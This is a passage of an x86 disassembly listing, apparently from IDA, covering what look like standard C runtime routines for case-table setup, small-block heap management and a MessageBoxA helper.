lea eax, [ebp+var_514]
push ds:dword_407324
push ds:dword_407100
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_40371C
push 0
lea eax, [ebp+var_214]
push ds:dword_407100
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push ds:dword_407324
call sub_4046FE
push 0
lea eax, [ebp+var_314]
push ds:dword_407100
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push ds:dword_407324
call sub_4046FE
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_403BDC: ; CODE XREF: sub_403AE6+135�j
mov dx, [ecx]
test dl, 1
jz short loc_403BFA
or ds:byte_407221[eax], 10h
mov dl, [ebp+eax+var_214]
loc_403BF2: ; CODE XREF: sub_403AE6+127�j
mov ds:byte_407120[eax], dl
jmp short loc_403C16
; ---------------------------------------------------------------------------
loc_403BFA: ; CODE XREF: sub_403AE6+FC�j
test dl, 2
jz short loc_403C0F
or ds:byte_407221[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_403BF2
; ---------------------------------------------------------------------------
loc_403C0F: ; CODE XREF: sub_403AE6+117�j
and ds:byte_407120[eax], 0
loc_403C16: ; CODE XREF: sub_403AE6+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_403BDC
jmp short loc_403C68
; ---------------------------------------------------------------------------
loc_403C1F: ; CODE XREF: sub_403AE6+1D�j
xor eax, eax
mov esi, 100h
loc_403C26: ; CODE XREF: sub_403AE6+180�j
cmp eax, 41h
jb short loc_403C44
cmp eax, 5Ah
ja short loc_403C44
or ds:byte_407221[eax], 10h
mov cl, al
add cl, 20h
loc_403C3C: ; CODE XREF: sub_403AE6+174�j
mov ds:byte_407120[eax], cl
jmp short loc_403C63
; ---------------------------------------------------------------------------
loc_403C44: ; CODE XREF: sub_403AE6+143�j
; sub_403AE6+148�j
cmp eax, 61h
jb short loc_403C5C
cmp eax, 7Ah
ja short loc_403C5C
or ds:byte_407221[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_403C3C
; ---------------------------------------------------------------------------
loc_403C5C: ; CODE XREF: sub_403AE6+161�j
; sub_403AE6+166�j
and ds:byte_407120[eax], 0
loc_403C63: ; CODE XREF: sub_403AE6+15C�j
inc eax
cmp eax, esi
jb short loc_403C26
loc_403C68: ; CODE XREF: sub_403AE6+137�j
pop esi
leave
retn
sub_403AE6 endp
; =============== S U B R O U T I N E =======================================
sub_403C6B proc near ; CODE XREF: sub_402D47+9�p
; sub_402D9F+D�p ...
cmp ds:dword_407448, 0
jnz short locret_403C86
push 0FFFFFFFDh
call sub_4038A7
pop ecx
mov ds:dword_407448, 1
locret_403C86: ; CODE XREF: sub_403C6B+7�j
retn
sub_403C6B endp
; =============== S U B R O U T I N E =======================================
sub_403C87 proc near ; CODE XREF: sub_402D9F+9D�p
; sub_4030A5+BF�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_403CB4
push esi
call sub_403D68
pop ecx
test eax, eax
push esi
jz short loc_403CA6
push eax
call sub_403D93
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_403CA6: ; CODE XREF: sub_403C87+13�j
push 0
push ds:dword_407328
call ds:dword_405084 ; RtlFreeHeap
loc_403CB4: ; CODE XREF: sub_403C87+7�j
pop esi
retn
sub_403C87 endp
; =============== S U B R O U T I N E =======================================
sub_403CB6 proc near ; CODE XREF: sub_402D9F+3A�p
; sub_402D9F+6F�p ...
arg_0 = dword ptr 4
push ds:dword_4070E0
push [esp+4+arg_0]
call sub_403CC8
pop ecx
pop ecx
retn
sub_403CB6 endp
; =============== S U B R O U T I N E =======================================
sub_403CC8 proc near ; CODE XREF: sub_403CB6+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_403CF1
loc_403CCF: ; CODE XREF: sub_403CC8+27�j
push [esp+arg_0]
call sub_403CF4
test eax, eax
pop ecx
jnz short locret_403CF3
cmp [esp+arg_4], eax
jz short locret_403CF3
push [esp+arg_0]
call sub_40494D
test eax, eax
pop ecx
jnz short loc_403CCF
loc_403CF1: ; CODE XREF: sub_403CC8+5�j
xor eax, eax
locret_403CF3: ; CODE XREF: sub_403CC8+13�j
; sub_403CC8+19�j
retn
sub_403CC8 endp
; =============== S U B R O U T I N E =======================================
sub_403CF4 proc near ; CODE XREF: sub_403CC8+B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, ds:dword_406F28
ja short loc_403D0C
push esi
call sub_4040BE
test eax, eax
pop ecx
jnz short loc_403D28
loc_403D0C: ; CODE XREF: sub_403CF4+B�j
test esi, esi
jnz short loc_403D13
push 1
pop esi
loc_403D13: ; CODE XREF: sub_403CF4+1A�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push ds:dword_407328
call ds:dword_405060 ; RtlAllocateHeap
loc_403D28: ; CODE XREF: sub_403CF4+16�j
pop esi
retn
sub_403CF4 endp
; =============== S U B R O U T I N E =======================================
sub_403D2A proc near ; CODE XREF: sub_403382+20�p
push 140h
push 0
push ds:dword_407328
call ds:dword_405060 ; RtlAllocateHeap
test eax, eax
mov ds:dword_4070FC, eax
jnz short loc_403D47
retn
; ---------------------------------------------------------------------------
loc_403D47: ; CODE XREF: sub_403D2A+1A�j
and ds:dword_4070F4, 0
and ds:dword_4070F8, 0
push 1
mov ds:dword_4070F0, eax
mov ds:dword_4070E8, 10h
pop eax
retn
sub_403D2A endp
; =============== S U B R O U T I N E =======================================
sub_403D68 proc near ; CODE XREF: sub_403C87+A�p
arg_0 = dword ptr 4
mov eax, ds:dword_4070F8
lea ecx, [eax+eax*4]
mov eax, ds:dword_4070FC
lea ecx, [eax+ecx*4]
loc_403D78: ; CODE XREF: sub_403D68+26�j
cmp eax, ecx
jnb short loc_403D90
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_403D92
add eax, 14h
jmp short loc_403D78
; ---------------------------------------------------------------------------
loc_403D90: ; CODE XREF: sub_403D68+12�j
xor eax, eax
locret_403D92: ; CODE XREF: sub_403D68+21�j
retn
sub_403D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D93 proc near ; CODE XREF: sub_403C87+16�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov eax, [ecx+10h]
mov esi, edx
sub esi, [ecx+0Ch]
mov ebx, [edx-4]
add edx, 0FFFFFFFCh
push edi
shr esi, 0Fh
mov ecx, esi
mov edi, [edx-4]
imul ecx, 204h
dec ebx
mov [ebp+var_4], edi
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ebx
mov [ebp+var_10], ecx
mov ecx, [ebx+edx]
test cl, 1
mov [ebp+var_8], ecx
jnz short loc_403E59
sar ecx, 4
push 3Fh
dec ecx
pop edi
mov [ebp+arg_4], ecx
cmp ecx, edi
jbe short loc_403DEB
mov [ebp+arg_4], edi
loc_403DEB: ; CODE XREF: sub_403D93+53�j
mov ecx, [ebx+edx+4]
cmp ecx, [ebx+edx+8]
jnz short loc_403E3D
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403E19
mov edi, 80000000h
shr edi, cl
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+44h], edi
dec byte ptr [ecx]
jnz short loc_403E3D
mov ecx, [ebp+arg_0]
and [ecx], edi
jmp short loc_403E3D
; ---------------------------------------------------------------------------
loc_403E19: ; CODE XREF: sub_403D93+68�j
add ecx, 0FFFFFFE0h
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+0C4h], edi
dec byte ptr [ecx]
jnz short loc_403E3D
mov ecx, [ebp+arg_0]
and [ecx+4], edi
loc_403E3D: ; CODE XREF: sub_403D93+60�j
; sub_403D93+7D�j ...
mov ecx, [ebx+edx+8]
mov edi, [ebx+edx+4]
mov [ecx+4], edi
mov ecx, [ebx+edx+4]
mov edi, [ebx+edx+8]
add ebx, [ebp+var_8]
mov [ecx+8], edi
mov [ebp+var_C], ebx
loc_403E59: ; CODE XREF: sub_403D93+45�j
mov edi, ebx
sar edi, 4
dec edi
cmp edi, 3Fh
jbe short loc_403E67
push 3Fh
pop edi
loc_403E67: ; CODE XREF: sub_403D93+CF�j
mov ecx, [ebp+var_4]
and ecx, 1
mov [ebp+var_14], ecx
jnz loc_403F16
sub edx, [ebp+var_4]
mov ecx, [ebp+var_4]
sar ecx, 4
push 3Fh
mov [ebp+var_8], edx
dec ecx
pop edx
cmp ecx, edx
mov [ebp+arg_4], ecx
jbe short loc_403E92
mov [ebp+arg_4], edx
mov ecx, edx
loc_403E92: ; CODE XREF: sub_403D93+F8�j
add ebx, [ebp+var_4]
mov edi, ebx
mov [ebp+var_C], ebx
sar edi, 4
dec edi
cmp edi, edx
jbe short loc_403EA4
mov edi, edx
loc_403EA4: ; CODE XREF: sub_403D93+10D�j
cmp ecx, edi
jz short loc_403F13
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
cmp edx, [ecx+8]
jnz short loc_403EFB
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403ED7
mov edx, 80000000h
shr edx, cl
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+44h], edx
dec byte ptr [ecx]
jnz short loc_403EFB
mov ecx, [ebp+arg_0]
and [ecx], edx
jmp short loc_403EFB
; ---------------------------------------------------------------------------
loc_403ED7: ; CODE XREF: sub_403D93+126�j
add ecx, 0FFFFFFE0h
mov edx, 80000000h
shr edx, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+0C4h], edx
dec byte ptr [ecx]
jnz short loc_403EFB
mov ecx, [ebp+arg_0]
and [ecx+4], edx
loc_403EFB: ; CODE XREF: sub_403D93+11E�j
; sub_403D93+13B�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov [edx+8], ecx
loc_403F13: ; CODE XREF: sub_403D93+113�j
mov edx, [ebp+var_8]
loc_403F16: ; CODE XREF: sub_403D93+DD�j
cmp [ebp+var_14], 0
jnz short loc_403F25
cmp [ebp+arg_4], edi
jz loc_403FAE
loc_403F25: ; CODE XREF: sub_403D93+187�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_403FAE
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_403F82
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_403F71
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_403F71: ; CODE XREF: sub_403D93+1CE�j
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
lea eax, [eax+esi*4+44h]
or [eax], ebx
jmp short loc_403FAB
; ---------------------------------------------------------------------------
loc_403F82: ; CODE XREF: sub_403D93+1C8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_403F98
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_403F98: ; CODE XREF: sub_403D93+1F3�j
lea ecx, [edi-20h]
mov edi, 80000000h
shr edi, cl
lea eax, [eax+esi*4+0C4h]
or [eax], edi
loc_403FAB: ; CODE XREF: sub_403D93+1ED�j
mov ebx, [ebp+var_C]
loc_403FAE: ; CODE XREF: sub_403D93+18C�j
; sub_403D93+1B6�j
mov eax, [ebp+var_10]
mov [edx], ebx
mov [ebx+edx-4], ebx
dec dword ptr [eax]
jnz loc_4040B9
mov eax, ds:dword_4070F4
test eax, eax
jz loc_4040AB
mov ecx, ds:dword_4070EC
mov edi, ds:dword_405088
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call edi ; VirtualFree
mov ecx, ds:dword_4070EC
mov eax, ds:dword_4070F4
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, ds:dword_4070F4
mov ecx, ds:dword_4070EC
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, ds:dword_4070F4
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, ds:dword_4070F4
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_404039
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, ds:dword_4070F4
loc_404039: ; CODE XREF: sub_403D93+29B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_4040AB
push ebx
push 0
push dword ptr [eax+0Ch]
call edi ; VirtualFree
mov eax, ds:dword_4070F4
push dword ptr [eax+10h]
push 0
push ds:dword_407328
call ds:dword_405084 ; RtlFreeHeap
mov eax, ds:dword_4070F8
mov edx, ds:dword_4070FC
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, ds:dword_4070F4
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_404970
mov eax, [ebp+arg_0]
add esp, 0Ch
dec ds:dword_4070F8
cmp eax, ds:dword_4070F4
jbe short loc_40409D
sub eax, 14h
loc_40409D: ; CODE XREF: sub_403D93+305�j
mov ecx, ds:dword_4070FC
mov ds:dword_4070F0, ecx
jmp short loc_4040AE
; ---------------------------------------------------------------------------
loc_4040AB: ; CODE XREF: sub_403D93+233�j
; sub_403D93+2AA�j
mov eax, [ebp+arg_0]
loc_4040AE: ; CODE XREF: sub_403D93+316�j
mov ds:dword_4070F4, eax
mov ds:dword_4070EC, esi
loc_4040B9: ; CODE XREF: sub_403D93+226�j
pop edi
pop esi
pop ebx
leave
retn
sub_403D93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040BE proc near ; CODE XREF: sub_403CF4+E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_4070F8
mov edx, ds:dword_4070FC
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_4040FE
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_40410E
; ---------------------------------------------------------------------------
loc_4040FE: ; CODE XREF: sub_4040BE+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_40410E: ; CODE XREF: sub_4040BE+3E�j
mov eax, ds:dword_4070F0
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_404135
loc_40411C: ; CODE XREF: sub_4040BE+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404135
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_40411C
loc_404135: ; CODE XREF: sub_4040BE+5C�j
; sub_4040BE+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_4041B3
mov ebx, edx
loc_40413C: ; CODE XREF: sub_4040BE+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404158
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404156
add ebx, 14h
jmp short loc_40413C
; ---------------------------------------------------------------------------
loc_404156: ; CODE XREF: sub_4040BE+91�j
cmp ebx, eax
loc_404158: ; CODE XREF: sub_4040BE+83�j
jnz short loc_4041B3
loc_40415A: ; CODE XREF: sub_4040BE+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_404170
cmp dword ptr [ebx+8], 0
jnz short loc_40416D
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_40415A
; ---------------------------------------------------------------------------
loc_40416D: ; CODE XREF: sub_4040BE+A5�j
cmp ebx, [ebp+var_4]
loc_404170: ; CODE XREF: sub_4040BE+9F�j
jnz short loc_404198
mov ebx, edx
loc_404174: ; CODE XREF: sub_4040BE+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404188
cmp dword ptr [ebx+8], 0
jnz short loc_404186
add ebx, 14h
jmp short loc_404174
; ---------------------------------------------------------------------------
loc_404186: ; CODE XREF: sub_4040BE+C1�j
cmp ebx, eax
loc_404188: ; CODE XREF: sub_4040BE+BB�j
jnz short loc_404198
call sub_4043C7
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_4041AC
loc_404198: ; CODE XREF: sub_4040BE:loc_404170�j
; sub_4040BE:loc_404188�j
push ebx
call sub_404478
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_4041B3
loc_4041AC: ; CODE XREF: sub_4040BE+D8�j
xor eax, eax
jmp loc_4043C2
; ---------------------------------------------------------------------------
loc_4041B3: ; CODE XREF: sub_4040BE+7A�j
; sub_4040BE:loc_404158�j ...
mov ds:dword_4070F0, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_4041DA
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404211
loc_4041DA: ; CODE XREF: sub_4040BE+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_40420E
loc_4041F7: ; CODE XREF: sub_4040BE+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_4041F7
loc_40420E: ; CODE XREF: sub_4040BE+137�j
mov edx, [ebp+var_4]
loc_404211: ; CODE XREF: sub_4040BE+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_40423A
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_40423A: ; CODE XREF: sub_4040BE+16D�j
; sub_4040BE+183�j
test ecx, ecx
jl short loc_404243
shl ecx, 1
inc edi
jmp short loc_40423A
; ---------------------------------------------------------------------------
loc_404243: ; CODE XREF: sub_4040BE+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_404260
push 3Fh
pop esi
loc_404260: ; CODE XREF: sub_4040BE+19D�j
cmp esi, edi
jz loc_404375
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4042D1
cmp edi, 20h
jge short loc_4042A0
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_4042CE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_4042D1
; ---------------------------------------------------------------------------
loc_4042A0: ; CODE XREF: sub_4040BE+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_4042CE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_4042D1
; ---------------------------------------------------------------------------
loc_4042CE: ; CODE XREF: sub_4040BE+1D6�j
; sub_4040BE+203�j
mov ebx, [ebp+arg_0]
loc_4042D1: ; CODE XREF: sub_4040BE+1B0�j
; sub_4040BE+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_404381
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_404372
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_404343
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_404331
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_404331: ; CODE XREF: sub_4040BE+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_404372
; ---------------------------------------------------------------------------
loc_404343: ; CODE XREF: sub_4040BE+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_40435C
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_40435C: ; CODE XREF: sub_4040BE+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_404372: ; CODE XREF: sub_4040BE+24E�j
; sub_4040BE+283�j
mov ecx, [ebp+var_8]
loc_404375: ; CODE XREF: sub_4040BE+1A4�j
test ecx, ecx
jz short loc_404384
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_404384
; ---------------------------------------------------------------------------
loc_404381: ; CODE XREF: sub_4040BE+229�j
mov ecx, [ebp+var_8]
loc_404384: ; CODE XREF: sub_4040BE+2B9�j
; sub_4040BE+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_4043BA
cmp ebx, ds:dword_4070F4
jnz short loc_4043BA
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_4070EC
jnz short loc_4043BA
and ds:dword_4070F4, 0
loc_4043BA: ; CODE XREF: sub_4040BE+2E0�j
; sub_4040BE+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_4043C2: ; CODE XREF: sub_4040BE+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4040BE endp
; =============== S U B R O U T I N E =======================================
sub_4043C7 proc near ; CODE XREF: sub_4040BE+CC�p
mov eax, ds:dword_4070F8
mov ecx, ds:dword_4070E8
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_40440A
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push ds:dword_4070FC
push edi
push ds:dword_407328
call ds:dword_405058 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_40445A
add ds:dword_4070E8, 10h
mov ds:dword_4070FC, eax
mov eax, ds:dword_4070F8
loc_40440A: ; CODE XREF: sub_4043C7+11�j
mov ecx, ds:dword_4070FC
push 41C4h
push 8
lea eax, [eax+eax*4]
push ds:dword_407328
lea esi, [ecx+eax*4]
call ds:dword_405060 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_40445A
push 4
push 2000h
push 100000h
push edi
call ds:dword_40505C ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_40445E
push dword ptr [esi+10h]
push edi
push ds:dword_407328
call ds:dword_405084 ; RtlFreeHeap
loc_40445A: ; CODE XREF: sub_4043C7+30�j
; sub_4043C7+67�j
xor eax, eax
jmp short loc_404475
; ---------------------------------------------------------------------------
loc_40445E: ; CODE XREF: sub_4043C7+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc ds:dword_4070F8
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_404475: ; CODE XREF: sub_4043C7+95�j
pop edi
pop esi
retn
sub_4043C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404478 proc near ; CODE XREF: sub_4040BE+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_40448A: ; CODE XREF: sub_404478+19�j
test eax, eax
jl short loc_404493
shl eax, 1
inc ebx
jmp short loc_40448A
; ---------------------------------------------------------------------------
loc_404493: ; CODE XREF: sub_404478+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_4044A8: ; CODE XREF: sub_404478+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_4044A8
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call ds:dword_40505C ; VirtualAlloc
test eax, eax
jnz short loc_4044DB
or eax, 0FFFFFFFFh
jmp loc_40456E
; ---------------------------------------------------------------------------
loc_4044DB: ; CODE XREF: sub_404478+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_404521
lea eax, [edi+10h]
loc_4044E8: ; CODE XREF: sub_404478+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_4044E8
loc_404521: ; CODE XREF: sub_404478+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_40455E
or [eax+4], edi
loc_40455E: ; CODE XREF: sub_404478+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_40456E: ; CODE XREF: sub_404478+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_404478 endp
; =============== S U B R O U T I N E =======================================
sub_404573 proc near ; CODE XREF: sub_4035C9+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp ds:dword_4070B0, ebx
push esi
push edi
jnz short loc_4045C2
push offset aUser32_dll ; "user32.dll"
call ds:dword_405014 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4045F8
mov esi, ds:dword_405054
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov ds:dword_4070B0, eax
jz short loc_4045F8
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov ds:dword_4070B4, eax
call esi ; GetProcAddress
mov ds:dword_4070B8, eax
loc_4045C2: ; CODE XREF: sub_404573+B�j
mov eax, ds:dword_4070B4
test eax, eax
jz short loc_4045E1
call eax
mov ebx, eax
test ebx, ebx
jz short loc_4045E1
mov eax, ds:dword_4070B8
test eax, eax
jz short loc_4045E1
push ebx
call eax
mov ebx, eax
loc_4045E1: ; CODE XREF: sub_404573+56�j
; sub_404573+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call ds:dword_4070B0
loc_4045F4: ; CODE XREF: sub_404573+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4045F8: ; CODE XREF: sub_404573+1C�j
; sub_404573+33�j
xor eax, eax
jmp short loc_4045F4
sub_404573 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404600 proc near ; CODE XREF: sub_4035C9+C5�p
